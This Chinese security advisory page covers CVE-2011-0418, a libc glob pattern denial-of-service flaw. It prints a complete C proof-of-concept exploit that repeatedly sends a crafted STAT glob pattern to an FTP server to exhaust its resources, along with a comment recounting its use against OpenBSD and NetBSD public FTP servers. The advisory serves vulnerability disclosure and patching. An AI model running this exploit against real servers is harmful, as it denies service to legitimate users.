首页 / 操作系统 / Linux / GNU libc glob(3) “pattern”远程拒绝服务漏洞
发布日期:2011-05-02 更新日期:2011-05-02受影响系统: NetBSD NetBSD 5.1 描述: -------------------------------------------------------------------------------- BUGTRAQ ID: 47671 CVE ID: CVE-2011-0418glibc是绝大多数Linux操作系统中C库的实现。GNU libc在实现上存在glob(3) "pattern"远程拒绝服务漏洞,远程攻击者可利用此漏洞使受影响计算机失去响应,拒绝服务合法用户。<*来源:Maksymilian Arciemowicz (max@jestsuper.pl) *>测试方法: --------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!#include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <netdb.h>/* PoC for multiple vendors ftpd (libc/glob) resource exhaustion [CVE-2010-2632]Affected Software (verified): - OpenBSD 4.7 - NetBSD 5.0.2 - FreeBSD 7.3/8.1 - Oracle Sun Solaris 10Affected Vendors (not verified): - GNU Libc (glibc) - Apple - Microsoft - HP - moreCredit: Maksymilian Arciemowicz cxib I securityreason J comNote: With similar script in php writed (this same pattern), we have attacked OpenBSD/NetBSD servers with result:- ftp.openbsd.org: Connection refusedand in the end of attack# telnet ftp.openbsd.org 21 Trying 129.128.5.191... Connected to ftp.openbsd.org. Escape character is "^]". 421- If you are seeing this message you have been blocked from using 421- this ftp server - most likely for mirroring content without paying 421- attention to what you were mirroring or where you should be mirroring 421- it from, or for excessive connection rates. 421- OpenBSD should *NOT* be mirrored from here, you should use 421- a second level mirror as described in http://www.openbsd.org/ftp.html 421Connection closed by foreign host. #-ftp.netbsd.org: no more access for anonymous => --- On 02.07.2010 20:29 CET, ftp.netbsd.org has return: 530 User ftp access denied, connection limit of 160 reached. ---and in the end, deny for my host.*/int sendftp(int stream,char *what){ if(-1==send(stream,what,strlen(what),0)) printf("Can"t send %s
",what); else printf("send: %s
",what); bzero(what,sizeof(what)); }void readftp(int stream,int len){ char readline[len]; if(recv(stream,readline,len,0)<1) printf("Can"t read from stream
"); else printf("recv: %s
",readline); } int sendstat(host,port,login,pass,pattern) char *host,*port,*login,*pass,*pattern; { char buffer[1024]; // send ftp command buffor int sockfd,n,error; struct addrinfo hints; struct addrinfo *res, *res0; memset(&hints, 0, sizeof(hints)); hints.ai_family = PF_UNSPEC; hints.ai_socktype = SOCK_STREAM; error = getaddrinfo(host,port,&hints,&res0); if (error){ errorcon: printf("Can`t connect
.exit"); exit(1); } if((sockfd=socket(res0->ai_family,res0->ai_socktype, res0->ai_protocol))<0) goto errorcon; if(-1==connect(sockfd,res0->ai_addr,res0->ai_addrlen)) goto errorcon; readftp(sockfd,1024); snprintf(buffer,1024,"USER %s
PASS %s
",login,pass); sendftp(sockfd,buffer); readftp(sockfd,1024); bzero(buffer,1024); snprintf(buffer,1024,"stat %s
",pattern); sendftp(sockfd,buffer); freeaddrinfo(res0); }int main(int argc,char *argv[]) { char pattern[1024]="{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*cx"; // some servers support only 1024 char *login,*pass; char logindef[]="anonymous",passdef[]="cve_2010_2632@127.0.0.1"; printf("This is exploit for CVE-2010-2632 (libc/glob)
by Maksymilian Arciemowicz
"); if(argc<3){ printf("Use: ./exploit host port [username] [password]
host and port are requied
"); exit(1); } char *host=argv[1]; char *port=argv[2]; if(4<=argc) login=argv[3]; else login=logindef; if(5<=argc) pass=argv[4]; else pass=passdef; while(1){ printf("----------------------------- next
"); sendstat(host,port,login,pass,pattern); sleep(3); // some delay to be sure } return 0; // never happen }建议: -------------------------------------------------------------------------------- 厂商补丁:NetBSD ------ 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:http://www.netbsd.org/Security/FFmpeg拒绝服务和“av_log_default_callback()”函数漏洞Mozilla Firefox/Thunderbird/SeaMonkey “resource:”协议目录遍历漏洞相关资讯 Linux漏洞
易网时代-编程资源站